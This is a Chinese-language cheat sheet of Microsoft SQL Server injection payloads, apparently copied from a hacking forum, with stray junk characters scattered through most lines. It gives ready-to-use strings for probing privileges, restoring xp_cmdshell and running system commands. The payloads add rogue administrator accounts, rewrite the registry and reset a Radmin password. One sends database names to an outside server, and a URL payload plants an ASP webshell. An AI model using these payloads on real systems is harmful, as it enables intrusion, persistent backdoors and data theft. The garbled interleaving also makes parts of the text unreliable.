//看看是什么权限的 E- t4 ]8 m% T+ O M6 s% E- Z
and 1=(Select IS_MEMBER('db_owner'))! E% V$ B' U# }/ V6 J0 B! V
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--( u. y* J+ g: s8 J% Z+ J
" S- G' a# X3 ?& T6 b//检测是否有读取某数据库的权限
$ e" Z8 @ A8 i' Rand 1= (Select HAS_DBACCESS('master'))
. q2 u0 S* K$ |$ f7 dAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
8 W$ ?$ B1 P. f2 N u$ R
8 u6 ^' K% o# G6 N# q9 ^0 o/ O* Z$ | y, K3 _* f- ^
数字类型
7 f" e9 X' I6 V: d- ^; } }and char(124)%2Buser%2Bchar(124)=0
. l' Y$ I* F( e8 g
2 e3 `& q) o5 w& w! w; }字符类型
: ]2 t1 {- T1 B# d1 n1 |5 l' and char(124)%2Buser%2Bchar(124)=0 and ''='3 h6 c {* Q4 G6 c; ^7 b
' m& }' p3 n2 g
搜索类型1 ~ x/ [1 u. C. D' A
' and char(124)%2Buser%2Bchar(124)=0 and '%'='5 [; G4 N5 w# |6 ~4 G F
+ B0 _) G1 {; v4 V- A! n% _爆用户名
$ _4 M6 t( D- d3 h/ T, p$ qand user>0
7 c: Q3 A n6 ]5 e+ S. n' and user>0 and ''='
8 `+ G F' R5 T9 @( r+ X
i# | T4 X3 _, F检测是否为SA权限
5 c' Z. N. C. ^6 @6 v. B& xand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
' U4 V6 F: t, M- L/ M' ~# RAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
. u' ]( _; n2 ^- v9 |6 L+ l. b
0 P6 s4 v3 u) M% x检测是不是MSSQL数据库
7 O: E! x* q( @" D# ~" ^$ Oand exists (select * from sysobjects);--$ _) ~: m) h/ {% G9 N
& R: |1 w" S' {* V3 ^: e" T0 U
检测是否支持多行
4 X" h2 ~' n+ a;declare @d int;--" {# _9 k, W4 ~3 O
& L) N+ _1 u2 d" j恢复 xp_cmdshell! [8 D$ s+ {! A$ N
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
1 t( f5 d5 w) m2 G" U* I9 O' }# V
# c3 B- C" ?& ^1 ~
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
, {0 F" ^9 t5 D4 H m% `' E2 b9 t$ a. i7 X% t: @ l
//-----------------------. g: y2 ~/ k5 k; P
// 执行命令5 O$ x0 S5 b0 T
//-----------------------1 O2 C- T) o, A9 `# d& f
首先开启沙盘模式:% d* i8 v& w* s5 L9 a6 |- N
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
- n, f5 d( K% f; M$ q) |* h" r" ]2 v9 B6 o! @( Y$ x' [, E
然后利用jet.oledb执行系统命令
& L4 l4 a. E ?8 B& J, A7 [$ \select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
) J+ ^ k8 c& J) X8 i; S- e" l5 n8 o4 M$ t' Q7 E4 N
执行命令
) K: H% b$ e: e: @/ z! F4 x;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
* j* _+ X; x% p. k; P
! W: |" p; P, j- e; x# p l; P5 DEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111': c% [+ r! N' T0 b% i! E$ O; l% p
! y* E4 E, V: c
判断xp_cmdshell扩展存储过程是否存在:6 u2 }1 [2 D6 N# p$ t
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')6 n! x+ d# B) G
; O5 p1 J4 W+ T |
写注册表; F0 k# f9 J- F$ b; E& l2 f2 z
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
# [2 ^+ y, r9 c1 a" j% e8 o8 B% n
* [+ y1 u2 X( i/ W& b7 @" pREG_SZ: e: x& _9 V; ~( E8 s! v
# k# D; N# L p
读注册表. L: ]1 h9 F5 | z
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'. Q+ G4 f5 A6 \+ ^3 g$ r
. [* P2 J9 }6 K; Y! n' B2 p- X- U读取目录内容
6 J* p. z7 b% G: s! `5 M9 zexec master..xp_dirtree 'c:\winnt\system32\',1,17 o6 Q, \ w' t5 s* Z" w" E
5 h; l$ O2 I+ g/ ^! d) }7 H( B$ f" U( }. ]" [$ o4 K2 X
数据库备份3 ?3 I7 {. z' o4 N: ?% \
backup database pubs to disk = 'c:\123.bak'5 g& u1 R W$ R. I1 z4 w1 y& t
% h" w- x) @# A; s s9 c! G
//爆出长度
# e/ U6 v' B9 A6 kAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--8 q3 l) `: z# q1 C% C' a
$ {7 G6 \' p ]3 [! L
& k) C1 f9 ~; H* c
- L% C% X' S2 |0 N+ R更改sa口令方法:用sql综合利用工具连接后,执行命令:1 o* \3 y, j, v* w6 ~/ V
exec sp_password NULL,'新密码','sa'
+ {9 L; d4 q% w) H" S- `3 @
* I( I3 P \6 ?6 x添加和删除一个SA权限的用户test:
9 g1 a3 H' s* kexec master.dbo.sp_addlogin test,9530772. b9 Y0 T( R1 r# O4 \
exec master.dbo.sp_addsrvrolemember test,sysadmin H7 t# I2 ]. \1 q& k7 o( ~7 ?+ D
3 o( x6 @( X' |+ ^2 j
删除扩展存储过过程xp_cmdshell的语句:/ x! n1 c9 ]9 {0 I7 H9 V9 K
exec sp_dropextendedproc 'xp_cmdshell') B& _/ h \0 n
5 g, i; {, ] w& N T添加扩展存储过过程9 j! M3 V/ o6 k! @/ B# @, H
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'& h' B" \& P) f: \& w3 J
GRANT exec On xp_proxiedadata TO public
1 }/ |+ d/ A6 `$ y
9 n$ ]% t# h& M5 [' d3 Q/ ]. G$ t; \. r% v, H a, O- z& B& k
停掉或激活某个服务。
3 k9 B0 U& | Y% ~5 E
; _: |# a( d. G( u( m" Gexec master..xp_servicecontrol 'stop','schedule'4 @$ I. K2 [( g5 j
exec master..xp_servicecontrol 'start','schedule'
, P$ R3 V/ U r, R' p) S5 d+ v1 I# @8 W& s5 [( a# [
dbo.xp_subdirs
+ z+ W. J" b% z2 h7 G) C) |' e8 u, D
只列某个目录下的子目录。
4 `- u1 ? Q; U' d& J0 n- [xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp': M! l, A! n/ G5 o; p& ?
! v4 c" t( C2 `; E3 X
dbo.xp_makecab" B' ]& M% u6 W6 d. @$ Z
# C$ v, f/ n' O1 e/ [0 K将目标多个档案压缩到某个目标档案之内。
5 W1 U0 N* g2 p所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。% H9 q9 y7 u" w+ l: f
. S, D+ S# _+ Kdbo.xp_makecab
, R6 L- t6 \+ o# l! w'c:\test.cab','mszip',1,( @0 r2 B! Z6 W- g
'C:\Inetpub\wwwroot\SQLInject\login.asp',
7 d& _1 W+ K& G'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'# b# T5 M/ h3 `, q/ f' u s/ A7 U8 X
+ U5 Z, h: F. H3 i& W% m+ ^xp_terminate_process6 q3 Y1 k5 H! @5 w# H, N: d
5 U. H! P) ]. Z1 H4 F/ K2 o
停掉某个执行中的程序,但赋予的参数是 Process ID。
& a. P. ^( I) E利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
6 Z5 N3 B" ^' L3 K9 t' B
- B# [( w1 S0 X0 A1 _4 dxp_terminate_process 2484
: W T$ Q+ Z4 u9 O* F/ K, R( {. s6 I0 k, @, k
xp_unpackcab
8 N& H8 o4 V$ a3 I
5 @5 H. ]4 i! N5 E9 G$ x$ I解开压缩档。" O/ G( {& z' A) S
& c. M, f5 b% M1 {1 x: C$ p8 t
xp_unpackcab 'c:\test.cab','c:\temp',1/ b0 {; b3 O$ n. a' C
7 ^8 }7 X+ Q+ Z5 |5 Y; \0 Q7 @" s
U! l2 F: d& x2 `
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12349 P* b! K, `- C! S) X* K1 }
5 \2 }/ \4 y: {) V8 U1 ~# screate database lcx;7 b4 Z9 I9 N. C# p+ e0 {. U9 P- m
Create TABLE ku(name nvarchar(256) null); o1 E- c, ?/ v
Create TABLE biao(id int NULL,name nvarchar(256) null);
% t' n2 U0 x; v8 l
o* q; y& c# W9 B; q//得到数据库名
9 K5 Q2 o1 I. g/ ^3 q* H0 Q( Finsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
& ~1 b) [2 L0 Z& T; l& C1 Y0 _0 S3 P! }7 u
# M5 i! X" r3 U) O# P
//在Master中创建表,看看权限怎样2 o; P. d9 r0 Q/ C
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
# @9 Q5 @" w. [+ D8 x) y# O7 Y# q7 L. l( x( T* _$ k5 z% T
用 sp_makewebtask直接在web目录里写入一句话马:* s b1 H) N! E; m1 S
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
8 b4 W/ w; h% a6 r( R; X* ]2 p, {7 x3 B9 Y& b6 K1 E3 i. A' j
//更新表内容0 |; j- ?8 H& i
Update films SET kind = 'Dramatic' Where id = 1234 V$ L9 H+ c0 U3 J$ f
# J& \" M8 d# d+ q* u( R7 ~
//删除内容
" k4 W+ ?8 U% H3 t7 U5 p( l1 f- Pdelete from table_name where Stockid = 3 |